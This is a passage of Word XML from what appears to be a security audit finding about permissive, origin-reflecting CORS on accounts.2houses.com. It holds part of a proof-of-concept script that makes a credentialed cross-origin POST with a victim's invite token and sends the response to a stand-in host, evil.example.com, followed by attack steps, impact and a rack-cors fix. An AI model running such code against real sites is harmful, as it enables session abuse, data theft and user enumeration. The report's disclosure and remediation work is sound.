        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       credentials: 'include',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       headers: { 'Content-Type': 'application/json' },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">       body: JSON.stringify({ user: { email: 'attacker-controlled@x.com',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       password: 'Hunter2!', </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       password_confirmation: 'Hunter2!',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       invitation: VICTIM_INVITE_TOKEN,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       locale: 'en' } })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     }).then(r =&gt; r.json()).then(d =&gt; fetch('https://evil.example.com/log?'+JSON.stringify(d)));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker sends a victim (authenticated 2houses user) a link to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>evil.example.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflects and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the victim's browser submits this cross-origin POST with the victim's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>_accounts_session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies attached.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attacker's JS reads the response (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches), exfiltrates it. Attacker can now:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Accept invitations on behalf of the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Register new accounts with the victim's invite tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Probe other </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/api/v1/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoints for the same behaviour (enumeration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>check_registration.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals whether an email is already registered on 2houses, an attacker can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enumerate 2houses users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by replaying it with a list of emails — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>confirmed reachable from any origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Blast radius</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every endpoint under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/api/v1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> likely inherits the same permissive CORS (confirmed for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>complete_authentication.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; not probed individually for the others to avoid triggering any side-effects, but the Rails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>rack-cors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware would match on path prefix).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any other API under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with cookie-gated behaviour is at risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>domain=2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie (FINDING-001), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an attacker origin doesn't need XSS to attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. The victim just needs to visit the attacker page while logged in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Immediate mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>rack-cors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> config (usually </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>config/initializers/cors.rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># WRONG (what we think is shipped):</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># allow do</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">#   origins '*'   # or reflected  </w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#   resource '/api/v1/*', credentials: true</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># end</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># RIGHT:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rails.application.config.middleware.insert_before 0, Rack::Cors do</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  allow do</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    origins 'https://www.2houses.com',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            'https://my.2houses.com',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            'https://tools.2houses.com'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    resource '/api/v1/*',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers:     :any,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      methods:     [:get, :post, :options],</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      credentials: true</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  end</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>end</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Key rules:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Never</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflect the request Origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Never</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> combine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with credentials (browsers reject that combo, but a reflective policy is worse).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
